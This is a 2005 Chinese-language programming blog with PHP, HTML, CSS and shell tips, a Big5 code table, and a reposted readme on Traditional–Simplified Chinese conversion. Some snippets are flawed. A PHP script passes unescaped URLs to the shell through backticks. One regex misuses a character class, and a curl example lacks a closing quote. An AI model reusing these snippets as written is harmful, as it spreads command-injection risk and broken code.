April 07, 2005

CSS & Html 編碼問題

本文最新網址位於CSS & Html 編碼問題

CSS file 若是 Big5 編碼, 網頁頁面是 UTF-8 編碼, 會發現 CSS 完全沒有作用.
因為 瀏覽器會判斷不出來, 而無法轉換. 因此那 CSS 會 load 不進來.
CSS 樣式表的編碼 要 跟網頁編碼 都一樣才行.

Posted by jon at 08:52 AM | Comments (0) | TrackBack

濾掉一些特殊符號

抓回來的東西有太多的特殊符號(特別是拍賣. 購物等等的站)..
將那些符號濾掉比較好瀏覽. 寫個小 function 來小濾一下~ :)

//filter out symbols 濾掉一些星星等等的碼
function replace_char($s) {
$s = preg_replace("/([\x80-\xFF].|[\x02-\x7F])/", "\x01\$1", $s);
$pattern = "/(\x01\xa1[\xb3-\xbf]|\x01\xa2[\xa1-\xae])/";
$s = preg_replace($pattern, " ", $s);

$s = preg_replace("/[\x01]/", "", $s);

// 內碼表除了全形 0~9 和 ㄅㄆㄇ外全濾掉, 不過可能會造成有些中文字異常.
// 下述的不建議使用.
$s = preg_replace("/(\xa1[\x4a-\xfe])|(\xa2[\x40-\xae])/", "", $s);

return $s;
}

Posted by jon at 08:48 AM | Comments (0) | TrackBack

April 05, 2005

抓檔 & 更改檔名

本文最新網址位於抓檔和更改檔名

老師說過~ 程式設計師就是要 "懶"~..
只要做一次的事情就不做第二次.
需要重覆做的事情就交給電腦去做就好了~~
也就因此.. 為了 抓圖片 & 改檔名 等等~ 寫了隻小程式..
只要是連續數字要做任何命令的. 就靠它了~ :p

<?php
$url = <<<EOF
<br><img src=http://url/filename011.jpg>
..... 這邊放要抓的整批 url 位址
<br><img src=http://url/filename020.jpg>
EOF;

// 先把上面的資料轉成 array.
$url = explode("\n", $url);

// 取出 url, 準備使用 wget 抓取~
foreach($url as $key => $value) {
preg_match('/.*[^http](http.*[^jpg]jpg*).*/', $value, $real_url);

if(preg_match('/^http/', $real_url[1]))
$wget_url[] = $real_url[1];
}

$num = count($wget_url);
for($i = 0; $i < $num; $i++) {
$comm = "wget ".$wget_url[$i];
`$comm`;

// 若有需要更改檔名的話.
//$comm = "mv *".sprintf("%03s", $i).".jpg ".sprintf("%03s", $i).".jpg";
//`$comm`;
}
?>

Posted by jon at 09:45 AM | Comments (0) | TrackBack

March 31, 2005

修改所有指定檔案的權限

一行小指令. 但是很實用.
sudo chmod 644 `find . -iname '*htm*'`
以上指令是 將所有 htm 的檔案, 都 權限 都改成 644.
對團體要一起開發程式特別好用.
當團體通常都會設定 Group, 就改成 664 即可使用~ :p

Posted by jon at 02:58 PM | Comments (0) | TrackBack

March 29, 2005

Array 傳送到另一個頁面

若要將 Array 整個變數傳給另一個頁面. 做法:
用 serialize 先將 array 抓進來.編碼再印出來.
1. array.php

$array = array(........);
echo serialize($array);

再下一頁先用 curl 抓此頁面後. 再用 unserialize 還原成 $array 即可
2. getArray.php

$url = "http://url/array.php;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER , '1');
$str = curl_exec($ch);
curl_close($ch);
$array = unserialize($str);
再下來 $array 就是之前頁面的 $array 可以隨意使用囉 :)

Posted by jon at 09:39 AM | Comments (0) | TrackBack

March 08, 2005

Grab & Drop(Table 縮拉)

Grab & Drop
Table 還可以縮拉~~ 太神了~~ :p

Slide Bar

作者的 Blog - HedgerWow

Posted by jon at 10:06 AM | Comments (0) | TrackBack

Image Spring(圖片縮放)

Image Spring
用 javaScript 和 css 做 滑鼠移過去後圖片放大的特效.
用在 相簿 或 瀏覽一些商品 應該蠻不錯用的.

可以 Download 他的 Source Code.

<!--Image Spring Codes-->
<script language="JavaScript" src="js.js"></script><!--//Behavior Layer-->
<link rel=stylesheet type="text/css" href="css.css"><!--//Presentation Layer-->
<!--//Image Spring Codes-->
</head>
<!--Content+Structure Layer-->
<body>
<img src="http://www.siteexperts.com/gifs/selogo.gif" class="spring_image">

最主要就是這幾段而已 ~ :p

Posted by jon at 09:51 AM | Comments (0) | TrackBack

February 26, 2005

PHP 偵測 data 是何種 編碼

Multibyte String Functions
偵測一下資料是哪一種編碼. big5, utf-8.

範例:
<?php
$a = "今天天氣不錯";
echo mb_detect_encoding($a)."\n";
?>
show:
UTF-8

沒有 mb_detect_encoding 可以試試 iconv_get_encoding

以下取自 www.php.net
<?php
// Returns true if $string is valid UTF-8 and false otherwise.
function is_utf8($string) {

// From http://w3.org/International/questions/qa-forms-utf-8.html
return preg_match('%^(?:
[\x09\x0A\x0D\x20-\x7E] # ASCII
| [\xC2-\xDF][\x80-\xBF] # non-overlong 2-byte
| \xE0[\xA0-\xBF][\x80-\xBF] # excluding overlongs
| [\xE1-\xEC\xEE\xEF][\x80-\xBF]{2} # straight 3-byte
| \xED[\x80-\x9F][\x80-\xBF] # excluding surrogates
| \xF0[\x90-\xBF][\x80-\xBF]{2} # planes 1-3
| [\xF1-\xF3][\x80-\xBF]{3} # planes 4-15
| \xF4[\x80-\x8F][\x80-\xBF]{2} # plane 16
)*$%xs', $string);

} // function is_utf8
?>

Posted by jon at 08:54 AM | Comments (0) | TrackBack

February 25, 2005

Html 注意事項

一些 Html 本身的語法. (特別要留意語法要讓 Mozilla 和 IE 都能正常使用)
但是都沒有用到. 或平常都是直接拉來就用了.. 都沒有去留意.
真的要用的時後. 才發現 找不到或者不知道怎麼用~~
趕快來做個記錄吧~ :)

Flash:
<object width="762" height="102" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0">
<param name=movie value="images/01.swf">
<param name=quality value=high>
<embed src="images/01.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="762" height="102"></embed>
</object>
若沒有加 <embed src="images/01.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="762" height="102"></embed> 這一段.
則 Mozilla 就無法顯示 Flash. 相對 param 那個沒加 IE 就無法顯示.

Input:
平常 input type="submit" 這個東西. 他會自己秀出 button.
但是我不想他秀的是 button, 而是秀出一張圖片. 該怎麼做呢?
<input type="image" src="xxx.jpg">
這樣子就有 submit 的效果. 而且也就用圖片取代 button 了 :)

版權宣告 © 的寫法:
打 &copy; 秀出來就會變成 ©

標準語法注意事項: (算 XHTML 規定的一些小原則)
1. 所有 tag 中的文字一律小寫 ex: <html> (html 小寫)
2. 所有開始都一定要有結束, ex: <font>...</font> (結束標籤前面有 "/")
3. 所有 tag 中的參數一定要 " " 包住, ex: <font size="1"> (1 要用 " 包住)
4. 若只有單一標籤, 結尾要有 /, ex: <br />

Posted by jon at 09:07 AM | Comments (0) | TrackBack

February 24, 2005

內碼表

現在 XP 居然找不到內碼輸入法.
還是記下來. 以後要用直接複製比較快 :)

 A140     A141 ,  A142 、  A143 。  A144 .  A145 ‧  A146 ;  A147 :
 A148 ?  A149 !  A14A ︰  A14B …  A14C ‥  A14D ﹐  A14E ﹑  A14F ﹒
 A150 ·   A151 ﹔  A152 ﹕  A153 ﹖  A154 ﹗  A155 |  A156 –  A157 ︱
 A158 —  A159 ︳  A15A ╴  A15B ︴  A15C ﹏  A15D (  A15E )  A15F ︵
 A160 ︶  A161 {  A162 }  A163 ︷  A164 ︸  A165 〔  A166 〕  A167 ︹
 A168 ︺  A169 【  A16A 】  A16B ︻  A16C ︼  A16D 《  A16E 》  A16F ︽
 A170 ︾  A171 〈  A172 〉  A173 ︿  A174 ﹀  A175 「  A176 」  A177 ﹁
 A178 ﹂  A179 『  A17A 』  A17B ﹃  A17C ﹄  A17D ﹙  A17E ﹚  A1A1 ﹛
 A1A2 ﹜  A1A3 ﹝  A1A4 ﹞  A1A5 ‘  A1A6 ’  A1A7 “  A1A8 ”  A1A9 〝
 A1AA 〞  A1AB ‵  A1AC ′  A1AD #  A1AE &  A1AF *  A1B0 ※  A1B1 §
 A1B2 〃  A1B3 ○  A1B4 ●  A1B5 △  A1B6 ▲  A1B7 ◎  A1B8 ☆  A1B9 ★
 A1BA ◇  A1BB ◆  A1BC □  A1BD ■  A1BE ▽  A1BF ▼  A1C0 ㊣  A1C1 ℅
 A1C2 ¯   A1C3  ̄  A1C4 _  A1C5 ˍ  A1C6 ﹉  A1C7 ﹊  A1C8 ﹍  A1C9 ﹎
 A1CA ﹋  A1CB ﹌  A1CC ﹟  A1CD ﹠  A1CE ﹡  A1CF +  A1D0 -  A1D1 ×
 A1D2 ÷   A1D3 ±   A1D4 √  A1D5 <  A1D6 >  A1D7 =  A1D8 ≦  A1D9 ≧
 A1DA ≠  A1DB ∞  A1DC ≒  A1DD ≡  A1DE ﹢  A1DF ﹣  A1E0 ﹤  A1E1 ﹥
 A1E2 ﹦  A1E3 ~  A1E4 ∩  A1E5 ∪  A1E6 ⊥  A1E7 ∠  A1E8 ∟  A1E9 ⊿
 A1EA ㏒  A1EB ㏑  A1EC ∫  A1ED ∮  A1EE ∵  A1EF ∴  A1F0 ♀  A1F1 ♂
 A1F2 ⊕  A1F3 ⊙  A1F4 ↑  A1F5 ↓  A1F6 ←  A1F7 →  A1F8 ↖  A1F9 ↗
 A1FA ↙  A1FB ↘  A1FC ∥  A1FD ∣  A1FE /  A240 \  A241 ∕  A242 ﹨
 A243 $  A244 ¥  A245 〒  A246 ¢  A247 £  A248 %  A249 @  A24A ℃
 A24B ℉  A24C ﹩  A24D ﹪  A24E ﹫  A24F ㏕  A250 ㎜  A251 ㎝  A252 ㎞
 A253 ㏎  A254 ㎡  A255 ㎎  A256 ㎏  A257 ㏄  A258 °   A259 兙  A25A 兛
 A25B 兞  A25C 兝  A25D 兡  A25E 兣  A25F 嗧  A260 瓩  A261 糎  A262 ▁
 A263 ▂  A264 ▃  A265 ▄  A266 ▅  A267 ▆  A268 ▇  A269 █  A26A ▏
 A26B ▎  A26C ▍  A26D ▌  A26E ▋  A26F ▊  A270 ▉  A271 ┼  A272 ┴
 A273 ┬  A274 ┤  A275 ├  A276 ▔  A277 ─  A278 │  A279 ▕  A27A ┌
 A27B ┐  A27C └  A27D ┘  A27E ╭  A2A1 ╮  A2A2 ╰  A2A3 ╯  A2A4 ═
 A2A5 ╞  A2A6 ╪  A2A7 ╡  A2A8 ◢  A2A9 ◣  A2AA ◥  A2AB ◤  A2AC ╱
 A2AD ╲  A2AE ╳  A2AF 0  A2B0 1  A2B1 2  A2B2 3  A2B3 4  A2B4 5
 A2B5 6  A2B6 7  A2B7 8  A2B8 9  A2B9 Ⅰ  A2BA Ⅱ  A2BB Ⅲ  A2BC Ⅳ
 A2BD Ⅴ  A2BE Ⅵ  A2BF Ⅶ  A2C0 Ⅷ  A2C1 Ⅸ  A2C2 Ⅹ  A2C3 〡  A2C4 〢
 A2C5 〣  A2C6 〤  A2C7 〥  A2C8 〦  A2C9 〧  A2CA 〨  A2CB 〩  A2CC 十
 A2CD 卄  A2CE 卅  A2CF A  A2D0 B  A2D1 C  A2D2 D  A2D3 E  A2D4 F
 A2D5 G  A2D6 H  A2D7 I  A2D8 J  A2D9 K  A2DA L  A2DB M  A2DC N
 A2DD O  A2DE P  A2DF Q  A2E0 R  A2E1 S  A2E2 T  A2E3 U  A2E4 V
 A2E5 W  A2E6 X  A2E7 Y  A2E8 Z  A2E9 a  A2EA b  A2EB c  A2EC d
 A2ED e  A2EE f  A2EF g  A2F0 h  A2F1 i  A2F2 j  A2F3 k  A2F4 l
 A2F5 m  A2F6 n  A2F7 o  A2F8 p  A2F9 q  A2FA r  A2FB s  A2FC t
 A2FD u  A2FE v  A340 w  A341 x  A342 y  A343 z  A344 Α  A345 Β
 A346 Γ  A347 Δ  A348 Ε  A349 Ζ  A34A Η  A34B Θ  A34C Ι  A34D Κ
 A34E Λ  A34F Μ  A350 Ν  A351 Ξ  A352 Ο  A353 Π  A354 Ρ  A355 Σ
 A356 Τ  A357 Υ  A358 Φ  A359 Χ  A35A Ψ  A35B Ω  A35C α  A35D β
 A35E γ  A35F δ  A360 ε  A361 ζ  A362 η  A363 θ  A364 ι  A365 κ
 A366 λ  A367 μ  A368 ν  A369 ξ  A36A ο  A36B π  A36C ρ  A36D σ
 A36E τ  A36F υ  A370 φ  A371 χ  A372 ψ  A373 ω  A374 ㄅ  A375 ㄆ
 A376 ㄇ  A377 ㄈ  A378 ㄉ  A379 ㄊ  A37A ㄋ  A37B ㄌ  A37C ㄍ  A37D ㄎ
 A37E ㄏ  A3A1 ㄐ  A3A2 ㄑ  A3A3 ㄒ  A3A4 ㄓ  A3A5 ㄔ  A3A6 ㄕ  A3A7 ㄖ
 A3A8 ㄗ  A3A9 ㄘ  A3AA ㄙ  A3AB ㄚ  A3AC ㄛ  A3AD ㄜ  A3AE ㄝ  A3AF ㄞ
 A3B0 ㄟ  A3B1 ㄠ  A3B2 ㄡ  A3B3 ㄢ  A3B4 ㄣ  A3B5 ㄤ  A3B6 ㄥ  A3B7 ㄦ
 A3B8 ㄧ  A3B9 ㄨ  A3BA ㄩ  A3BB ˙  A3BC ˉ  A3BD ˊ  A3BE ˇ  A3BF ˋ
Posted by jon at 03:37 PM | Comments (0) | TrackBack

February 23, 2005

Regular Expression

用 正規表示式 的一些簡單範例.
PHP:
將 <form .....內容... > 濾掉.
preg_replace('/<form[^>]*>/i', '',$textarea);

將 <script 到 </script> 全部刪掉
preg_replace('/<script[^>]*?>.*?<\/script>/si', '', $textarea);

Posted by jon at 05:48 PM | Comments (0) | TrackBack

February 21, 2005

MySQL Triggers

Mysql 的 Trigger (觸發器)
MySQL Triggers Tryout

Posted by jon at 09:58 AM | Comments (0) | TrackBack

January 17, 2005

檢查 dead link

要檢查自己的網站有沒有 dead link.
非常簡易的方法~~ 運用 lynx ~~ :p
也可以說看到你的網站有那些對外的 link.
lynx -dump http://www.longwin.com.tw/~jon/blog/
看到最下面會出現 "隱藏的鏈結:"
這下面的就都是 dead link.

Posted by jon at 05:07 PM | Comments (0) | TrackBack

分析網站被搜尋引擎索引的情況

無名網路營銷 - 5月份
這個 Blog 看起來是到 10月就沒有再更新了..
不過他對搜尋引擎了解的也非常的深入..
光看 5月的文章就跟在挖寶一樣~~ 還有些分析 Log 的程式~~ 好好拜讀一下吧~ :)

以下轉載自: 無名網路營銷 - 5月份
- 其他網站設計提示

分析網站被搜尋引擎索引的情況


#!/bin/sh
YESTERDAY=`date -d yesterday +%Y%m%d`

# for FreeBSD: YESTERDAY=`date -v-1d +%Y%m%d`
LOG_FILE='/home/apache/logs/access_log'

grep -i Googlebot $LOG_FILE.$YESTERDAY|awk '{print $7}' |sort | uniq -c | sort -rn > spider/$YESTERDAY.googlebot.txt
grep -i baiduspider $LOG_FILE.$YESTERDAY|awk '{print $7}' |sort | uniq -c | sort -rn > spider/$YESTERDAY.baiduspider.txt
grep -i msnbot $LOG_FILE.$YESTERDAY|awk '{print $7}' |sort | uniq -c | sort -rn > spider/$YESTERDAY.msnbot.txt
grep -i inktomi $LOG_FILE.$YESTERDAY|awk '{print $7}' |sort | uniq -c | sort -rn > spider/$YESTERDAY.inktomi.txt
grep -i openbot $LOG_FILE.$YESTERDAY|awk '{print $7}' |sort |uniq -c | sort -rn > spider/$YESTERDAY.openbot.txt
grep -i Slurp $LOG_FILE.$YESTERDAY|awk '{print $7}' |sort |uniq -c | sort -rn > spider/$YESTERDAY.yahoo.txt


由這隻程式就可以知道 搜尋引擎的 bot 來你的網站抓走哪些資料.
抓了幾次.. 等等的資訊.

Posted by jon at 02:53 PM | Comments (0) | TrackBack

css form 不換行寫法

本文最新網址位於 Html: label (radio bottom)小技巧CSS: 不換行 寫法

在寫 Html 的時, 寫到 FORM 會讓造成空隔多空一行 等等的問題..
以往都是將 Form 塞到 Table 跟 tr 間 的這些方法來解決..
事實上 css 有簡易的解法~~~ 照下面的一設就搞定了~
form{margin:0px;}
就當做是 Html 的小技巧吧~ :)

Html 小技巧
<input id="abc" type="radio"... ><label for="abc">這是oo</label>
<input id="def" type="radio"... ><label for="def">這是xx</label>
這樣子就不用說一定要點到圓圈的 Radio Button.
只要點到文字就可以選擇到 radio 的圈圈了~~
可參考提高Web 設计的可讀性

Posted by jon at 01:34 PM | Comments (0) | TrackBack

January 13, 2005

OOP 對 PHP 的影響

本文最新網址 OOP 對 PHP 的影響

How efficient is OOP in PHP?
這篇測試報告用 class, function 和 直接執行 3 種方式比較.(有圖表和數據比較)
然後來看看各個所花的時間是多少. 看來 OOP 對 速度 有蠻大的影響.

雖然 OOP 可以讓程式開發起來比較快.但是速度上的考量也是不可或缺的.
要怎麼達到平衡. 未來在寫的時後要再多評估一下.
(這是直譯程式大概都會遇到的問題吧).

Posted by jon at 09:48 PM | Comments (0) | TrackBack

January 05, 2005

繁簡轉換

繁簡轉換 一般單純的繁簡轉換是蠻簡單就可以做到的..
不過要做到詞類都轉換的話就有點困難..
ex: 光碟 <-> 光盤.
這些就需要一些對應表.. 深入中 Kii Ali 大大的轉換寫的非常詳細..
程式中也有附上這些對應表 :)

PHP魔法大陸 - 利用 JavaScript 繁簡轉換

http://www.php5.idv.tw 的轉法是
utf8 -> big 5 再由 big5 -> gb2312 然後 gb2312 -> utf8.

Kii Ali 大大寫的轉換程式 ftp://ftp.ntu.edu.tw/cpatch/patchutil/bgconv/bgconv1033.exe
裝完後記得仔細看看 readme.txt..
readme 有原理等等詳細的說明 :)

版本說明: http://www2.tw.freebsd.org/cpatch/patchutil/bgconv/bgconv1033.txt


因為寫的很棒.. 所以 以下 轉載自 軟體安裝完後的 readme.txt
=========================
您好,弟是 Kii Ali

■序

這篇文章原出於 06-03-2001 ,發表在 cpatch 內部 patch-author
的「簡轉繁,也能任你玩弄?理論」一文。後來又增補了不少。
索性重寫,祇留下部分的原文。

當時在考慮簡繁轉換的理論,因為祇著重在電腦專有名詞的轉換
,而沒能致力在一般性文章的轉換。在跟 Chen Kuan-Ta 陳寬達
討論時,陳也以為這些文字和語法必然有一定規則可循。但我找
不到人可以問,沒有人會花心力祇為解決繁簡轉換而去研究。

每個人都以為,這會隨著海峽兩岸用語的交流,而逐漸解決。每
個人卻也抱怨從簡體轉繁體過來的東西,總有那一點不完美。我
祇是一個做中文化的人,雖然也做簡體中文化都做,但這幾乎已
經是國學和文字學的範圍。

後來才發狠下心,把 BIG5 和 GB2312 、 GBK extension 都重
疊比較,才發覺『簡繁轉換「多對一」』才是問題核心。很高
興能這樣做,在不同的瞭解水準上,重新認識中國文字。

不願意我的作品祇侷限在臺灣。也希望儘快看到大陸的,繁體中
文化作品。我的眼中祇有好作品,沒有什麼臺灣大陸的分別。

■版權

本程式是免費軟體,不論是第二版或以後的任何版本,你可以在
依據自由軟體基金會 (Free Software Foundation, Inc.) 一般
公用授權 ( GNU GENERAL PUBLIC LICENSE ),公開許可之下,
在網路上任意散播並修改它。

非經 Kii Ali 書面許可,不允許將原理、字庫、對照表、轉換
詞庫之一部或全部,整合進入商業或營利軟體販售。

■感謝

必須感謝底下武漢朋友的協助,如果不是她在電腦的另一端一邊
上班一邊查簡體的辭典,變成小學生的查字典比賽,和忍受我不斷
的詢問,和各式各樣的白癡拼字法,以便躲過 Tencent QQ 本身的
簡繁轉換限制,注音符號和漢語拼音同來,和她的鼓勵,將不會有
這個對照表出現。

Huang Xiaodan

承臺灣教育部的「國語辭典」網頁,多所協助,亦在此致謝。

http://www.edu.tw/clc/dict/

承 Huang Xiaodan 寄來的「現代漢語小詞典」,上海商務所出,
當然是簡體版本。方便了這方面的校對工作。向來很少聽到別人以
讀詞典為樂,不過,我把這本書讀完了。

■簡繁轉換「多對一」前提

範例 1

頭「髮」和「發」生。

說明 1

這兩個「發」在簡體看來都一樣。「頭發」和「發生」。

範例 2

俺「干」爹在「乾」清宮上對故宮「干」事員說,你吃
「干」果和牛肉「干」的聲音,真是「干」擾我們的游興,真想
找人海「干」你一頓。

俺「乾」爹在「乾」清宮上對故宮「幹」事員說,你吃
「乾」果和牛肉「乾」的聲音,真是「干」擾我們的遊興,真想
找人海「幹」你一頓。

說明 2

A1 這些「干」在繁體每個都不一樣,包括「干 幹 乾」。

A2 如果更粗俗一點,「相干 相幹 相乾」三者可是大大不同。
事物相干:事情相涉。
男女相幹:男女間做出性交動作。
相乾為敬:喝酒喝完。

會不會大陸人把這些全部用同一個「相干」表示?還好中間的詞
不太登大雅之堂,否則「我要跟○○○睡覺相干,這事跟你沒有相
干」這是什麼意思,到底誰要「干」誰啦,真夠頭痛的。

範例 3

由苗栗縣苑「里」鎮,開車到到南投縣水「里」鄉市街「里」面
需要多少公「里」?這些公「里」數大約合多少海「里」?又合
多少英「里」?

由苗栗縣苑「裡」鎮,開車到到南投縣水「里」鄉市街「裡」面
需要多少公「里」?這些公「里」數大約合多少海「浬」?又合
多少英「哩」?

結論

1.繁轉簡,問題較少,因為繁體字都可以對應到單一的簡體字。
2.簡轉繁問題大了,轉回來的常常不正確,因為有一些簡體字常對
應兩三個繁體字,而且各字的原始意義差異甚大。這麻煩了。
3.這也是大陸漢化作者,一直沒能跨進臺灣中文化的原因之一。

■完整解決理論

1. 內碼的轉換,包含 big5 (臺灣), gb2312 (大陸)
2. 電腦專有名詞的對換
3. 多個不同繁體字,對應同一簡體字

1.「內碼表」

雖然有公開,但在標點符號部分沒有完全校正。大陸使用內
碼直到 GBK extension 才支援相對於臺灣 BIG5 的雙線方框
。而一般大陸早有的俄文和希臘文,在臺灣祇有造字格式可以
找到。因此在這裡補強。

2.「電腦的專有名詞」

如下,這些在 Kii Ali 的作品可以找到工具。

"印表機" (臺灣) -> "打印機" (大陸)
"說明檔案" (臺灣) -> "幫助文件" (大陸)
"線上作業" (臺灣) -> "脫機操作" (大陸)

3.「多個繁體字,對應同一簡體字」

以下列四個繁體常用字為例,對應到同一個簡體字。

榦 乾 幹 干 (臺灣) → 干 (大陸)

幹事 乾燥 牛肉乾 乾坤 乾隆 相干 (臺灣)
干事 干燥 牛肉干 乾坤 乾隆 相干 (大陸)

這些字幾乎全部換成「干」,但是使用破音字的唸法如「乾
隆」就不能寫成「干隆」。

因此,要找出這些「多對一繁轉簡」在繁體辭彙組的各種形式,
干事→幹事、干燥→乾燥、乾隆→乾隆,才可能解決這層問題。

■繁簡字對應情形

0.一對二繁轉簡
1.一對一繁轉簡
2.四對一繁轉簡
3.三對一繁轉簡
4.二對一繁轉簡:純簡體字
5.二對一繁轉簡:完全無關
6.二對一繁轉簡:異體字
7.二對一繁轉簡:較古異體字
8.二對一繁轉簡:罕用異體字
9.二對一繁轉簡:不可混用字根
10.二對一繁轉簡:可混用字根
11.二對一繁轉簡:狹義字→廣義字
12.二對一繁轉簡:繁罕字→簡常字
13.二對一繁轉簡:繁罕字→簡罕字


■0.一對二繁轉簡

目前只有此字,無法在繁體中文系統顯示。一般的繁體書也把這
兩者混用。但此字的確在大陸的一般用法是有分別的。

繁體 簡体 繁體辭彙 / 簡体詞匯
====================================================================
著 -> 著 羊 著作 著迷 著急 (臺灣) 著作 羊迷 羊急 (大陸)
目 目 目

「羊目」的簡體碼為 D7C5
「著」的簡體碼為 D6F8

■1.一對一繁轉簡

1)一繁體字在簡體系統,對應到一簡體字。
2)絕對對應的情形。
3)部首簡化,如「車 言 金 馬」這些明顯祇有部首簡化,但仍
為同一個字。

■2.四對一繁轉簡

1)四個繁體字在簡體系統裡面,對應到同一簡體字。
2)在繁體系統,則四字意義各不相同。


繁體 簡体 繁體辭彙 / 簡体詞匯
====================================================================
榦 乾 幹 干 -> 干 國之楨榦 幹事 乾燥 乾坤 乾隆 相干 干擾 (臺灣)
國之楨干 干事 干燥 乾坤 乾隆 相干 干擾 (大陸)
檯 颱 臺 台 -> 台 檯燈 颱風 臺灣 天台山 (臺灣)
台燈 台風 台灣 天台山 (大陸)
浬 裏 裡 里 -> 里 海浬 裏面 裡面 里程 (臺灣)
海里 里面 里面 里程 (大陸)
挶 跼 侷 局 -> 局 挶 跼促 侷限 分局 (臺灣)
局 局促 局限 分局 (大陸)
懞 矇 濛 蒙 -> 蒙 懞懂 矇著 濛濛 蒙古 (臺灣)
蒙懂 蒙著 蒙蒙 蒙古 (大陸)
琱 鵰 彫 雕 -> 雕 玉琱 大鵰 彫弓 雕刻 (臺灣)
玉雕 大雕 雕弓 雕刻 (大陸)
採 采 寀 埰 -> 采 採集 采風 寀 埰 (臺灣)
采集 采風 采 采 (大陸)
罣 窐 掛 挂 -> 挂 罣 窐 掛念 挂 (臺灣)
挂 挂 挂念 挂 (大陸)
洼 窐 窪 漥 -> 窪 洼 窐 窪 漥地 (臺灣)
漥 漥 漥 漥地 (大陸)

■3.三對一繁轉簡

1)三個繁體字在簡體系統裡面,對應到同一簡體字。

繁體 簡体 繁體辭彙 簡体詞匯
====================================================================
復 複 复 -> 复 復興 複習 複製 (臺灣) 复興 复習 复製 (大陸)
繫 係 系 -> 系 連繫 關係 系統 (臺灣) 連系 關系 系統 (大陸)
併 並 并 -> 并 合併 並肩 并 (臺灣) 合并 并肩 并 (大陸)
汎 氾 泛 -> 泛 汎汎 氾濫 泛泛 (臺灣) 泛泛 泛濫 泛泛 (大陸)
儸 囉 羅 -> 羅 儸儸族 囉囉 羅 (臺灣) 羅羅族 羅羅 羅 (大陸)
陞 昇 升 -> 升 高陞 昇平 升格 (臺灣) 高升 升平 升格 (大陸)
崚 稜 棱 -> 棱 峰崚 稜線 棱 (臺灣) 峰棱 棱線 棱 (大陸)
柺 枴 拐 -> 拐 柺 枴杖 拐彎 (臺灣) 拐 拐杖 拐彎 (大陸)
譭 燬 毀 -> 毀 譭謗 焚燬 毀壞 (臺灣) 毀謗 焚毀 毀壞 (大陸)
囓 齧 嚙 -> 嚙 囓齒 齧齒動物 (臺灣) 嚙齒 嚙齒動物 嚙 (大陸)
鑤 鉋 刨 -> 刨 鑤光 鉋刀 刨冰 (臺灣) 刨光 刨刀 刨冰 (大陸)
甦 囌 蘇 -> 蘇 甦醒 囌 蘇州 (臺灣) 蘇醒 蘇 蘇州 (大陸)
醼 讌 燕 -> 燕 飲醼 談讌 燕子 (臺灣) 飲燕 談燕 燕子 (大陸)
粄 闆 板 -> 板 粄條 老闆 木板 (臺灣) 板條 老板 木板 (大陸)
衚 鬍 胡 -> 胡 衚衕 鬍鬚 胡適 (臺灣) 胡同 胡須 胡适 (大陸)
祇 隻 只 -> 只 祇有 一隻 一只 (臺灣) 只有 一只 一只 (大陸)
猺 傜 瑤 -> 瑤 猺族 傜族 瑤池 (臺灣) 瑤族 瑤族 瑤池 (大陸)

痳 痲 麻 -> 麻 痲瘋 麻油 (臺灣) 麻瘋 麻油 (大陸)
噹 儅 當 -> 當 叮噹 當然 (臺灣) 叮當 當然 (大陸)
癒 瘉 愈 -> 愈 病癒 愈加 (臺灣) 病愈 愈加 (大陸)
巖 嵒 岩 -> 岩 巖石 岩石 (臺灣) 岩石 岩石 (大陸)
攕 縴 纖 -> 纖 縴夫 纖維 (臺灣) 纖夫 纖維 (大陸)
喒 偺 咱 -> 咱 偺們 咱們 (臺灣) 咱們 咱們 (大陸)
桮 盃 杯 -> 杯 獎盃 酒杯 (臺灣) 獎杯 酒杯 (大陸)
埳 崁 坎 -> 坎 崁腳 坎坷 (臺灣) 坎腳 坎坷 (大陸)
厤 曆 歷 -> 歷 日曆 歷史 (臺灣) 日歷 歷史 (大陸)
鏚 慼 戚 -> 戚 慼慼 戚(姓) (臺灣) 戚戚 戚(姓) (大陸)
曏 嚮 向 -> 向 嚮導 方向 (臺灣) 向導 方向 (大陸)
餧 餵 喂 -> 喂 餵食 喂 (臺灣) 喂食 喂 (大陸)
罋 甕 瓮 -> 瓮 請君入甕 (臺灣) 請君入瓮 (大陸)
葠 蔘 參 -> 參 人蔘 參加 (臺灣) 參 人蔘 參加 (大陸)
斲 斮 斫 -> 斫 斲鼻 斫鼻 (臺灣) 斫鼻 斫鼻 (大陸)

琖 醆 盞 -> 盞 盞 (臺灣) 盞 (大陸)
騃 獃 呆 -> 呆 獃頭鵝 (臺灣) 呆頭鵝 (大陸)
掽 踫 碰 -> 碰 碰見 (臺灣) 碰見 (大陸)
暠 皜 皓 -> 皓 皓皓 (臺灣) 皓皓 (大陸)
讙 懽 歡 -> 歡 歡樂 (臺灣) 歡樂 (大陸)
噉 啗 啖 -> 啖 啖飯 (臺灣) 啖飯 (大陸)
虖 謼 呼 -> 呼 呼喊 (臺灣) 呼喊 (大陸)
麤 粗 觕 -> 粗 粗細 (臺灣) 粗細 (大陸)
絜 潔 洁 -> 洁 純潔 (臺灣) 純洁 (大陸)
簆 蔻 寇 -> 寇 流寇 (臺灣) 流寇 (大陸)
膵 脺 胰 -> 胰 胰臟 (臺灣) 胰臟 (大陸)
拏 挐 拿 -> 拿 拿起 (臺灣) 拿起 (大陸)


■4.二對一繁轉簡:純簡體字

1)一簡體字與一繁體字,在簡體系統對應到同一簡體字。
2)被簡化的字體形式,沒有擁有其他意義,可以完全以繁體
形式替代。

繁體 簡体 繁體辭彙 簡体詞匯
====================================================================
兒 儿 -> 儿 eg. 兒子 (臺灣) 儿子 (大陸)
屍 尸 -> 尸 eg. 屍體 (臺灣) 尸体 (大陸)
捍 扞 -> 捍 eg. 捍衛 (臺灣) 扞衛 (大陸)
氣 气 -> 气 eg. 空氣 (臺灣) 空气 (大陸)
異 异 -> 异 eg. 變異 (臺灣) 變异 (大陸)
術 朮 -> 朮 eg. 美術 (臺灣) 美朮 (大陸)
勝 胜 -> 胜 eg. 勝利 (臺灣) 胜利 (大陸)
棲 栖 -> 栖 eg. 棲息 (臺灣) 栖息 (大陸)
湧 涌 -> 涌 eg. 泉湧 (臺灣) 泉涌 (大陸)
極 极 -> 极 eg. 極度 (臺灣) 极度 (大陸)
萬 万 -> 万 eg. 萬全 (臺灣) 万全 (大陸)
聖 圣 -> 圣 eg. 聖經 (臺灣) 圣經 (大陸)
